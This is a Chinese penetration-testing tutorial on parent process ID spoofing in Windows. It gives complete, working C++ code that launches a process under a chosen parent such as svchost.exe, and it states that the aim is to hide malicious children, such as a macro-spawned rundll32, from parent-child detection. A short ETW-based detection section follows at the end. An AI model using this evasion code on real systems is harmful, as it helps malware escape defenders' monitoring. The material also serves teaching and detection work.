问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Parent Process ID (PPID) Spoofing
渗透测试
不多bb,今天我们一起来学习 PPID 欺骗
0x00 前言 ------- 不多bb,今天我们一起学习 PPID Spoofing(父进程id欺骗)。 本文主要内容如下: - ppid spoofing 的目的和原理 - 如何实现 ppid spoofing - 检测 ppid spoofing 之 ETW 的使用 - 利用和检测工具 0x01 目的和原理 ---------- PPID欺骗是一种允许攻击者选择任意进程启动其恶意程序的技术。这可以让攻击者的程序看起来是由另一个进程产生的,主要用于逃避基于父/子进程关系的检测。 例如,默认情况下,大多数需要用户交互启动的程序都是由`explorer.exe`生成的,比如我们在桌面新建一个**文本文档**,然后用记事本打开,效果如下图: > 这里会用到 [Process Explorer](https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer) 或者 [Process Hacker](https://processhacker.sourceforge.io/downloads.php) 观察进程之间的关系。  可以看到很明显的父子关系。`explorer.exe`->`notepad.exe` 然而,通过下面的代码,我们可以让`notepad.exe`看起来好像是由`onenote.exe`(PID:12896)产生的。 > 代码的具体意思,后面会一一解释,这里先直接用。 ```cpp #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <TlHelp32.h> #include <iostream> int main() { STARTUPINFOEXA si; PROCESS_INFORMATION pi; SIZE_T attributeSize; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); // 要修改这里的 pid HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 12896); InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); si.StartupInfo.cb = sizeof(STARTUPINFOEXA); CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi); return 0; } ```  咋做到的呢?这里的关键是 [CreateProcessA](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa) 函数  `CreateProcessA` 一般用来创建新的进程,并且默认情况下,将使用继承的父级创建进程。比如,通过 cmd 打开的,它爸爸就是cmd。但是,此函数还支持一个名为 `lpStartupInfo` 的参数,你可以在其中自定义其父进程。  `lpStartupInfo`参数指向[STARTUPINFO](https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/ns-processthreadsapi-startupinfoa) 和 [STARTUPINFOEX](https://docs.microsoft.com/en-us/windows/desktop/api/winbase/ns-winbase-startupinfoexa) 结构体。这里我们只看 `STARTUPINFOEX` 结构体,此结构体包含一个`lpAttributeList`。  而`lpAttributeList`是 [InitializeProcThreadAttributeList](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-initializeprocthreadattributelist) 函数创建的。  在文档下面的备注上写了,要添加属性到列表中,要调用 [UpdateProcThreadAttribute](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute) 函数,点进去看看  看到有个属性参数:`Attribute`  添加啥属性呢?`PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` 属性,设置进程的父进程。  有啥实际用途呢?当我们用 cs 的 office 宏生成 word 文档,受害者打开该文档上线时。 > cs 的 office 宏上线网上大把资料,这里就不具体描述了  可以明显看到 word.exe 下有个 rundll32.exe  蓝队的小伙伴一看到这种不正常的父子关系,就知道肯定有问题了。因此,PPID欺骗,就是为了逃避这种基于父子关系的检测的。 0x02 实现 ------- 在知道大概的原理和目的之后,我们先捋一下要调用`CreateProcessA`修改父进程的思路。 ```php CreateProcessA -> lpStartupInfo -> STARTUPINFOEX -> lpAttributeList -> InitializeProcThreadAttributeList -> UpdateProcThreadAttribute -> PROC_THREAD_ATTRIBUTE_PARENT_PROCESS ``` 有了思路之后,我们开始仔细讲讲,这个代码是怎么写出来的。其实顺着思路往下写就行了。 先看`CreateProcessA`  这里的第一个参数上程序名,第二个参数是命令行,因为我们要启动记事本,所以这里有两个选择 ```cpp // 直接填 notepad 的路径 LPCWSTR spawnProcess = L"C:\\Windows\\System32\\notepad.exe"; CreateProcess(spawnProcess, NULL, // 或者不填 notepad 的路径,直接填 notepad 的启动命令,我比较懒,选择了这个 CreateProcessA(NULL, (LPSTR)"notepad", 。。。 ``` 第三四个参数可选,直接填NULL,第五个参数是要不要继承句柄,这里填FALSE即可,所以,现在如下: ```cpp CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE,。。。 ``` 第六个参数是[进程创建标记](https://docs.microsoft.com/en-us/windows/win32/procthread/process-creation-flags),因为我们要`lpStartupInfo` 参数指向 `STARTUPINFOEX` 结构,所以这里要填`EXTENDED_STARTUPINFO_PRESENT`  此时为: ```cpp CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, 。。。 ``` 第七八个参数,可选,直接填NULL,第九个参数是`lpStartupInfo`,**先留着**,第十个参数是输出用的指针,按照同样的结构定义一个即可。因此现在如下: ```cpp PROCESS_INFORMATION pi; CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 【lpStartupInfo】, &pi); ``` ok,现在要处理`【lpStartupInfo】`的问题了。 `lpStartupInfo` 需要指向结构体 `STARTUPINFOEX`,那我们就声明这个结构体,并把它初始化,全部填0,如下: ```cpp STARTUPINFOEXA si; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); ``` 结构体 `STARTUPINFOEX`里面有个参数`lpAttributeList`,需要调用函数`InitializeProcThreadAttributeList`初始化。此外,这个结构体的`StartupInfo`参数的`cb`必须设置成`sizeof(STARTUPINFOEX)`   在给`lpAttributeList`进行初始化之前,我们首先得分配内存空间,那空间大小应该是多少呢?只要给`InitializeProcThreadAttributeList`函数传入的`lpAttributeList`为NULL,就能拿到。所以现在的流程是,先调用`InitializeProcThreadAttributeList`拿到`lpAttributeList`的空间大小后,然后给`lpAttributeList`分配内存空间,接着再调用`InitializeProcThreadAttributeList`对`lpAttributeList`初始化。代码如下: ```cpp // 存储空间大小的变量 SIZE_T attributeSize; // 获取 lpAttributeList 的空间大小 InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); // 给 lpAttributeList 分配内存空间,直接用 HeapAlloc分配就行 si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); // 初始化 lpAttributeList InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); // 文档要求的赋值 si.StartupInfo.cb = sizeof(STARTUPINFOEXA); ``` 最后是`UpdateProcThreadAttribute` 更新`lpAttributeList`的属性为 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`  第一个参数就是`si.lpAttributeList`,第二个是保留参数,必须为0,第三个参数就是更改的属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`,第六七两个参数可选,为NULL即可。第四、五个参数分别是指向属性值的指针和大小,这里填父进程的句柄([OpenProcess](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess)可以拿到)即可,如下: > 这里其实可以直接剽文档地下的 demo:<https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute> >  ```cpp HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 12896); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); ``` OK,把所有代码整合起来,就是一开始贴出来的代码了。 ```cpp #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <TlHelp32.h> #include <iostream> int main() { STARTUPINFOEXA si; PROCESS_INFORMATION pi; SIZE_T attributeSize; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); // 要修改这里的 pid HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, 12896); InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); si.StartupInfo.cb = sizeof(STARTUPINFOEXA); CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi); return 0; } ``` 0x03 完善代码 --------- ok,我们已经知道怎么实现**PPID 欺骗**,接下来就是对刚刚对代码进行简单的优化。优化啥呢?想一下,我们每次进行欺骗的时候,都要手动输入目标进程的 pid,这太麻烦了。 于是我们新增一个 `ggetPPID`函数用于检索我们要欺骗的父进程的PID。比如我们获取`OneDrive.exe`进程的 PID 。然后代码使用函数`CreateProcess`生成一个新`notepad.exe`进程,如下: ```cpp #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <TlHelp32.h> #include <iostream> DWORD getPPID(LPCWSTR processName) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, processName)) break; } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); return process.th32ProcessID; } int main() { STARTUPINFOEXA si; PROCESS_INFORMATION pi; SIZE_T attributeSize; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); LPCWSTR parentProcess = L"OneDrive.exe"; DWORD parentPID = getPPID(parentProcess); printf("[+] Spoofing %ws (PID: %u) as the parent process.\n", parentProcess, parentPID); HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, parentPID); InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); si.StartupInfo.cb = sizeof(STARTUPINFOEXA); LPCWSTR spawnProcess = L"C:\\Windows\\System32\\notepad.exe"; CreateProcess(spawnProcess, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (STARTUPINFO*)&si, &pi); printf("[+] Spawning %ws (PID: %u)\n", spawnProcess, pi.dwProcessId); return 0; } ``` 可以看到代码正常运行了。  但是,当我把父进程名字改成`scvhost.exe`的时候,我发现代码没有按预期工作,并没有启动记事本。  于是我打了个断点,发现`parentProcessHandle`竟然是空的,说明`OpenProcess`不成功啊。  于是我怀疑是权限的问题。首先把 `integrity level(完整性级别)`列显示出来。 Process Explorer 的操作如下:    Process Hacker 的操作如下:   显示出来之后,我搜了一下`836`,果然,这个 svchost.exe 的完整性级别是 System,由于我们以标准用户身份运行,具有**MEDIUM**完整性级别,因此我们无权访问以**SYSTEM**完整性级别运行的进程。  那么我们如何解决这个问题呢?其实我们往下看,我们可以看到一些`svchost.exe`完整性级别为**Medium**进程。  所以,我们可以添加另一个函数来检查每个进程的完整性级别。用到的函数是[GetTokenInformation](https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-gettokeninformation),检索与进程关联的访问令牌的信息。  然后与[众所周知的 SID](https://docs.microsoft.com/en-us/windows/win32/secauthz/well-known-sids) 进行比较,就能确定进程的完整性级别了。然后在代码中加个判断,我们只要完整性级别是 Medium 不就行了吗?直接看代码。 ```cpp LPCWSTR getIntegrityLevel(HANDLE hProcess) { HANDLE hToken; OpenProcessToken(hProcess, TOKEN_QUERY, &hToken); DWORD cbTokenIL = 0; PTOKEN_MANDATORY_LABEL pTokenIL = NULL; GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL); pTokenIL = (TOKEN_MANDATORY_LABEL*)LocalAlloc(LPTR, cbTokenIL); GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL, cbTokenIL, &cbTokenIL); DWORD dwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0); if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) { return L"LOW"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) { return L"MEDIUM"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID) { return L"HIGH"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID) { return L"SYSTEM"; } } ``` 再修改一下`getIntegrityLevel`函数在`getPPID`函数中的调用。让它只会返回具有 Medium 完整性级别的父进程的 PID。 ```cpp DWORD getPPID(LPCWSTR processName) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, processName)) { HANDLE hProcess = OpenProcess(MAXIMUM_ALLOWED, FALSE, process.th32ProcessID); if (hProcess) { LPCWSTR integrityLevel = NULL; integrityLevel = getIntegrityLevel(hProcess); if (!wcscmp(integrityLevel, L"MEDIUM")) { break; } } } } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); return process.th32ProcessID; } ``` 现在代码如下: ```cpp #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <TlHelp32.h> #include <iostream> LPCWSTR getIntegrityLevel(HANDLE hProcess) { HANDLE hToken; OpenProcessToken(hProcess, TOKEN_QUERY, &hToken); DWORD cbTokenIL = 0; PTOKEN_MANDATORY_LABEL pTokenIL = NULL; GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL); pTokenIL = (TOKEN_MANDATORY_LABEL*)LocalAlloc(LPTR, cbTokenIL); GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL, cbTokenIL, &cbTokenIL); DWORD dwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0); if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) { return L"LOW"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) { return L"MEDIUM"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID) { return L"HIGH"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID) { return L"SYSTEM"; } } DWORD getPPID(LPCWSTR processName) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, processName)) { HANDLE hProcess = OpenProcess(MAXIMUM_ALLOWED, FALSE, process.th32ProcessID); if (hProcess) { LPCWSTR integrityLevel = NULL; integrityLevel = getIntegrityLevel(hProcess); if (!wcscmp(integrityLevel, L"MEDIUM")) { break; } } } } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); return process.th32ProcessID; } int main() { STARTUPINFOEXA si; PROCESS_INFORMATION pi; SIZE_T attributeSize; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); LPCWSTR parentProcess = L"svchost.exe"; DWORD parentPID = getPPID(parentProcess); printf("[+] Spoofing %ws (PID: %u) as the parent process.\n", parentProcess, parentPID); HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, parentPID); InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); si.StartupInfo.cb = sizeof(STARTUPINFOEXA); LPCWSTR spawnProcess = L"C:\\Windows\\System32\\notepad.exe"; CreateProcess(spawnProcess, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (STARTUPINFO*)&si, &pi); printf("[+] Spawning %ws (PID: %u)\n", spawnProcess, pi.dwProcessId); return 0; } ``` 直接运行,发现触发了异常,提示`pTokenIL`是空指针。好家伙,白嫖的代码,果然不能全信。  为啥是空指针?我也不知道,没办法,为了省事,省略了一堆的异常判断代码,所以导致现在为啥崩溃都不知道。于是乎,很快的,加上异常判断和错误输出。 加入异常判断的`getProcessIntegrityLevel`函数代码如下: > 代码魔改于 <https://github.com/cubika/OneCode/blob/master/Visual%20Studio%202008/CppCreateLowIntegrityProcess/CppCreateLowIntegrityProcess.cpp> ```cpp LPCWSTR getProcessIntegrityLevel(HANDLE hProcess, PDWORD pdwIntegrityLevel) { DWORD dwError = ERROR_SUCCESS; HANDLE hToken = NULL; DWORD cbTokenIL = 0; PTOKEN_MANDATORY_LABEL pTokenIL = NULL; if (pdwIntegrityLevel == NULL) { dwError = ERROR_INVALID_PARAMETER; goto Cleanup; } // 以TOKEN_QUERY开启此线程的主访问令牌。 if (!OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) { cout << "[!] OpenProcessToken error!" << endl; dwError = GetLastError(); goto Cleanup; } // 查询令牌完整性级别信息的大小。注意:我们预期得到一个FALSE结果及错误 // ERROR_INSUFFICIENT_BUFFER, 这是由于我们在GetTokenInformation输入一个 // 空缓冲。同时,在cbTokenIL中我们会得知完整性级别信息的大小。 if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL)) { if (ERROR_INSUFFICIENT_BUFFER != GetLastError()) { // 当进程运行于Windows Vista之前的系统中,GetTokenInformation返回 // FALSE和错误码ERROR_INVALID_PARAMETER。这是由于这些操作系统不支 // 持TokenElevation。 cout << "[!] GetTokenInformation no support !" << endl; dwError = GetLastError(); goto Cleanup; } } // 现在我们为完整性级别信息分配一个缓存。 pTokenIL = (TOKEN_MANDATORY_LABEL*)LocalAlloc(LPTR, cbTokenIL); if (pTokenIL == NULL) { cout << "[!] pTokenIL is null" << endl; dwError = GetLastError(); goto Cleanup; } // 获得令牌完整性级别信息。 if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL, cbTokenIL, &cbTokenIL)) { cout << "[!] GetTokenInformation error !" << endl; dwError = GetLastError(); goto Cleanup; } // 完整性级别SID为S-1-16-0xXXXX形式。(例如:S-1-16-0x1000表示为低完整性 // 级别的SID)。而且有且仅有一个次级授权信息。 *pdwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0); Cleanup: // 集中清理所有已分配的内存资源 if (hToken) { CloseHandle(hToken); hToken = NULL; } if (pTokenIL) { LocalFree(pTokenIL); pTokenIL = NULL; cbTokenIL = 0; } if (ERROR_SUCCESS != dwError) { // 失败时确保此能够获取此错误代码 SetLastError(dwError); return L"ERROR"; } else { if (*pdwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) { return L"LOW"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && *pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) { return L"MEDIUM"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID) { return L"HIGH"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID) { return L"SYSTEM"; } } } ``` 错误提示主要依靠函数[GetLastError](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror),当然它只返回一个errorcode,还需要用`FormatMessage`转换成字符串。 具体代码如下: > 代码来自于 [https://blog.csdn.net/qq\_34227896/article/details/86699941](https://blog.csdn.net/qq_34227896/article/details/86699941) ```cpp string get_last_error(DWORD errCode) { string err(""); if (errCode == 0) errCode = GetLastError(); LPTSTR lpBuffer = NULL; if (0 == FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, //标志位,决定如何说明lpSource参数,dwFlags的低位指定如何处理换行功能在输出缓冲区,也决定最大宽度的格式化输出行,可选参数。 NULL,//根据dwFlags标志而定。 errCode,//请求的消息的标识符。当dwFlags标志为FORMAT_MESSAGE_FROM_STRING时会被忽略。 MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),//请求的消息的语言标识符。 (LPTSTR)&lpBuffer,//接收错误信息描述的缓冲区指针。 0,//如果FORMAT_MESSAGE_ALLOCATE_BUFFER标志没有被指定,这个参数必须指定为输出缓冲区的大小,如果指定值为0,这个参数指定为分配给输出缓冲区的最小数。 NULL//保存格式化信息中的插入值的一个数组。 )) {//失败 char tmp[100] = { 0 }; sprintf_s(tmp, "{未定义错误描述(%d)}", errCode); err = tmp; } else//成功 { USES_CONVERSION; err = W2A(lpBuffer); LocalFree(lpBuffer); } return err; } ``` 再对`getPPID`进行简单的修改,如果`getProcessIntegrityLevel`返回的是 ERROR,则跳过,直到返回 MEDIUM。  现在代码如下: ```cpp #define _CRT_SECURE_NO_WARNINGS #include <windows.h> #include <TlHelp32.h> #include <stdio.h> #include <string> #include <iostream> #include <atlconv.h> using namespace std; string get_last_error(DWORD errCode) { string err(""); if (errCode == 0) errCode = GetLastError(); LPTSTR lpBuffer = NULL; if (0 == FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, //标志位,决定如何说明lpSource参数,dwFlags的低位指定如何处理换行功能在输出缓冲区,也决定最大宽度的格式化输出行,可选参数。 NULL,//根据dwFlags标志而定。 errCode,//请求的消息的标识符。当dwFlags标志为FORMAT_MESSAGE_FROM_STRING时会被忽略。 MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),//请求的消息的语言标识符。 (LPTSTR)&lpBuffer,//接收错误信息描述的缓冲区指针。 0,//如果FORMAT_MESSAGE_ALLOCATE_BUFFER标志没有被指定,这个参数必须指定为输出缓冲区的大小,如果指定值为0,这个参数指定为分配给输出缓冲区的最小数。 NULL//保存格式化信息中的插入值的一个数组。 )) {//失败 char tmp[100] = { 0 }; sprintf_s(tmp, "{未定义错误描述(%d)}", errCode); err = tmp; } else//成功 { USES_CONVERSION; err = W2A(lpBuffer); LocalFree(lpBuffer); } return err; } LPCWSTR getProcessIntegrityLevel(HANDLE hProcess, PDWORD pdwIntegrityLevel) { DWORD dwError = ERROR_SUCCESS; HANDLE hToken = NULL; DWORD cbTokenIL = 0; PTOKEN_MANDATORY_LABEL pTokenIL = NULL; if (pdwIntegrityLevel == NULL) { dwError = ERROR_INVALID_PARAMETER; goto Cleanup; } // 以TOKEN_QUERY开启此线程的主访问令牌。 if (!OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) { cout << "[!] OpenProcessToken error!" << endl; dwError = GetLastError(); goto Cleanup; } // 查询令牌完整性级别信息的大小。注意:我们预期得到一个FALSE结果及错误 // ERROR_INSUFFICIENT_BUFFER, 这是由于我们在GetTokenInformation输入一个 // 空缓冲。同时,在cbTokenIL中我们会得知完整性级别信息的大小。 if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL)) { if (ERROR_INSUFFICIENT_BUFFER != GetLastError()) { // 当进程运行于Windows Vista之前的系统中,GetTokenInformation返回 // FALSE和错误码ERROR_INVALID_PARAMETER。这是由于这些操作系统不支 // 持TokenElevation。 cout << "[!] GetTokenInformation no support !" << endl; dwError = GetLastError(); goto Cleanup; } } // 现在我们为完整性级别信息分配一个缓存。 pTokenIL = (TOKEN_MANDATORY_LABEL*)LocalAlloc(LPTR, cbTokenIL); if (pTokenIL == NULL) { cout << "[!] pTokenIL is null" << endl; dwError = GetLastError(); goto Cleanup; } // 获得令牌完整性级别信息。 if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL, cbTokenIL, &cbTokenIL)) { cout << "[!] GetTokenInformation error !" << endl; dwError = GetLastError(); goto Cleanup; } // 完整性级别SID为S-1-16-0xXXXX形式。(例如:S-1-16-0x1000表示为低完整性 // 级别的SID)。而且有且仅有一个次级授权信息。 *pdwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0); Cleanup: // 集中清理所有已分配的内存资源 if (hToken) { CloseHandle(hToken); hToken = NULL; } if (pTokenIL) { LocalFree(pTokenIL); pTokenIL = NULL; cbTokenIL = 0; } if (ERROR_SUCCESS != dwError) { // 失败时确保此能够获取此错误代码 SetLastError(dwError); return L"ERROR"; } else { if (*pdwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) { return L"LOW"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && *pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) { return L"MEDIUM"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID) { return L"HIGH"; } else if (*pdwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID) { return L"SYSTEM"; } } } DWORD getPPID(LPCWSTR processName) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); bool flag = false; if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, processName)) { HANDLE hProcess = OpenProcess(MAXIMUM_ALLOWED, FALSE, process.th32ProcessID); if (hProcess) { LPCWSTR integrityLevel = NULL; DWORD dwIntegrityLevel; integrityLevel = getProcessIntegrityLevel(hProcess, &dwIntegrityLevel); if (!wcscmp(integrityLevel, L"ERROR")) { cout << "[!] PID = " << process.th32ProcessID << " GetProcessIntegrityLevel failed, Error: " << get_last_error(GetLastError()) << endl; continue; } if (!wcscmp(integrityLevel, L"MEDIUM")) { flag = true; break; } } } } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); // 没有找到 MEDIUM 权限的进程 if (!flag) { cout << processName << " does have medium integrity level!!" << endl; exit(-1); } return process.th32ProcessID; } int main() { STARTUPINFOEXA si; PROCESS_INFORMATION pi; SIZE_T attributeSize; ZeroMemory(&si, sizeof(STARTUPINFOEXA)); LPCWSTR parentProcess = L"svchost.exe"; DWORD parentPID = getPPID(parentProcess); printf("[+] Spoofing %ws (PID: %u) as the parent process.\n", parentProcess, parentPID); HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, false, parentPID); InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); si.StartupInfo.cb = sizeof(STARTUPINFOEXA); LPCWSTR spawnProcess = L"C:\\Windows\\System32\\notepad.exe"; CreateProcess(spawnProcess, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (STARTUPINFO*)&si, &pi); printf("[+] Spawning %ws (PID: %u)\n", spawnProcess, pi.dwProcessId); return 0; } ``` 再次运行,可以看到,程序一开始尝试了pid 为 3868 的 svchost.exe,但是没有成功,提示“**拒绝访问**”,说明权限不够。然后尝试了 5964,成功了,在 Process Hacker 下也看到 notepad.exe 在 svchost.exe 了。  0x04 检测 ------- > 检测方法来源:<https://blog.f-secure.com/detecting-parent-pid-spoofing/> 上面我们展示了如何进行 ppid 欺骗,如果你是蓝队的小伙伴,在受害主机上用任务管理器或者进程管理器之类的工具查看正在运行的进程,只能看到欺骗后的 ID,那有没有啥办法可以找出真实的 ID 呢?这里就需要用到 [ETW(Event Tracing for Windows)](https://docs.microsoft.com/en-us/dotnet/framework/wcf/samples/etw-tracing)了,它是 Windows 提供的原生的事件跟踪日志系统,说人话就是,ETW 就是用来记录 Windows 系统日志的一个机制。 ### 1. ETW 概念 在开始使用之前,我们先来了解一下 ETW 相关的一些基本概念: > 这块可以去看 <https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/etw-event-tracing-for-windows-101> ,我这里会摘取文章的部分内容。 - `Providers(提供程序)`:可以产生事件日志的程序; - `Consumers`:订阅和监听 Providers 发出的事件的程序(这个本文用不到); - `Keywords(关键字)`:Providers 提供给 Consumer 的事件类型; - `Tracing session(跟踪会话)`:记录来自一个或多个 Providers 的事件; - `Contollers`:可以启动 Tracing session 的程序。 ### 2. 选择 Providers 了解完基本概念之后,然后根据官方文档 [ETW(Event Tracing for Windows)](https://docs.microsoft.com/en-us/dotnet/framework/wcf/samples/etw-tracing) 的提示,我们可以用 Windows 自带的工具 [Logman.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman-start-stop) 启动 [跟踪会话](https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-sessions)。 > 这里的 `Logman.exe`对应着上面的`Controllers`角色。 首先列出有哪些 Providers ```bash logman query providers ```  